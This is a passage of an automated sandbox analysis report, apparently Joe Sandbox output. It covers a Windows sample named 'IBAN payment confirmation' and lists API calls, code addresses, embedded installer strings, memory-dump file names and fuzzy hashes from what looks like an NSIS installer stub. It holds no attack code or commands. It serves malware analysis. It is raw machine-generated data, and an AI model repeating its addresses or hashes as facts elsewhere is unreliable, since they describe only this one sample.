                                                                                                                                • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                              • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                              • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                              • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                              • CloseClipboard.USER32 ref: 00405658
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                              • String ID: {
                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                              • Opcode ID: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                              • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                              • Opcode Fuzzy Hash: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                                              • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                              • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                              • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                              • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                              • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 184305955-0
                                                                                                                              • Opcode ID: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                              • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                              • Opcode Fuzzy Hash: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                                              • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                              • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,771B3420,00000000,00434000), ref: 00403935
                                                                                                                              • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
                                                                                                                              • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                              • GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
                                                                                                                                • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                              • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                              • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
                                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                              • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                              • API String ID: 914957316-1115850852
                                                                                                                              • Opcode ID: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                              • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                              • Opcode Fuzzy Hash: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                                              • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                                                              APIs
                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                              • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                              • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                              • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                              • String ID: CB@$N$open
                                                                                                                              • API String ID: 3615053054-4029390422
                                                                                                                              • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                              • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                              • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                              • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                              APIs
                                                                                                                              • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                              • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                              • wsprintfA.USER32 ref: 00405C80
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                              • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                              • API String ID: 1265525490-3322868524
                                                                                                                              • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                              • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                              • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                              • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                              APIs
                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                              • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                              • String ID: F
                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                              • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                              • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                              • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                              • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                              • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
                                                                                                                              • lstrcatW.KERNEL32(?,00427180), ref: 0040473D
                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061E1
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061F5
                                                                                                                                • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 00406208
                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                              • String ID: A
                                                                                                                              • API String ID: 2246997448-3554254475
                                                                                                                              • Opcode ID: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                              • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                              • Opcode Fuzzy Hash: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                              • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                                                • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                                              Strings
                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                              • soft, xrefs: 00402EAC
                                                                                                                              • Error launching installer, xrefs: 00402E0C
                                                                                                                              • Inst, xrefs: 00402EA3
                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                              • Null, xrefs: 00402EB5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                              • API String ID: 2803837635-787788815
                                                                                                                              • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                              • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                              • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                              • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                                              APIs
                                                                                                                              • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                              • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                              • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                              • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                              Strings
                                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
                                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
